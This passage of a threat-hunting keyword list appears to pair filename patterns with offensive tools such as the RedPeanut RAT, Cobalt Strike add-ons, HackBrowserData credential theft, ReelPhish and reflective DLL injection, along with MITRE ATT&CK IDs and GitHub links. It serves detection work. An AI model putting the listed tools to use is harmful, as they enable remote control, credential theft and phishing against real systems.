small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutRP.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutShooter.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutSpawn.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutSpawnTikiTorch.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedPeanutVBAMacro.vba*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RedSiege/CIMplant*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*redskal/SharpAzbelt*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*redsocks-fw.sh stop*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*Red-Team-Infrastructure-Wiki.*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*Red-Teaming-Toolkit*,offensive_tool_keyword,Red-Teaming-Toolkit,A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request,T1210 - T1211 - T1212 - T1547,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/infosecn1nja/Red-Teaming-Toolkit,1,1,N/A,N/A,10,7958,2071,2023-06-01T08:38:39Z,2018-04-26T13:35:09Z -*RedTeamOperations*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/RedTeamOperations,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*RedWarden.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*RedWarden.test*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*redwarden_access.log*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*redwarden_redirector.log*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*ReelPhish*,offensive_tool_keyword,ReelPhish,ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). Credentials will be submitted by the web browser,T1566 - T1114 - T1071 - T1547 - T1546,TA0001 - TA0003 - TA0008,N/A,N/A,Phishing,https://github.com/fireeye/ReelPhish,1,0,N/A,N/A,5,493,156,2023-08-11T01:40:07Z,2018-02-01T20:35:11Z -*reflct_dll_inject.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*reflective_assembly_minified.ps1*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*reflective_dll.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*reflective_dll.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reflective_dll.x64.dll*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*reflective_dll.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reflective_dll_inject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reflective_pe_loader.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveDll.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*ReflectiveDll.x64.dll*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*ReflectiveDll.x86.dll*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*ReflectiveDLLInjection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveDllInjection.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Reflective-HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*Reflective-HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*ReflectiveLoader.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*ReflectiveLoader.c*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveLoader.c*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z 